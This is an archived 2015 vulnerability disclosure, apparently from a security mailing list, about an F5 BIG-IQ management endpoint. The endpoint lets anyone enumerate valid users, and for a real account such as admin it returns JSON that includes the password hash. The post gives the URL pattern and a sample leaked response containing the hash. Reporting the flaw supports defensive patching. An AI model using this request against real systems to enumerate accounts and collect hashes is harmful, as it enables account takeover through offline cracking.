Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:32023
HistoryMay 11, 2015 - 12:00 a.m.

F5 BIG-IQ Enumeration of users and Information Disclosure

2015-05-1100:00:00
vulners.com
11
JSON

Hi,

I'm testing BIG-IQ v 0.0.7028,( no the last HF but i don't see the bug fix in the HF1) the new mngmt of F5 BIG-IP, i see that you are loggout and join to the next link

LINK : (where $user is the user)

https://127.0.0.1/mgmt/shared/authz/users/$user/

When i open this link and try some diff users like invalid users like test i get a java dump with a 404 error beacuase the use folder no exist.

"{"code":404,"message":"shared/authz/users/test","referer"

But if you try with a valid user like admin ( by default)

Yo get some details

{"name":"admin","displayName":"Admin User","encryptedPassword":"$6$5wF011Sk$xTaSIc.OKXUWJQ/BftjLiPzO7yjm3./Lw3TXLJ5Sge.AJv3mkA0EJds1dMX9jeKlNHS4ha1111puBSB/s61","groupReferences":[],"generation":6,"lastUpdateMicros":1430840911116662,"kind":"shared:authz:users:usersworkerstate","selfLink":"https://localhost/mgmt/shared/authz/users/admin"}

I think that is important fix it, and not display the users like a folder.

Juan Pablo Lopez Yacubian

JSON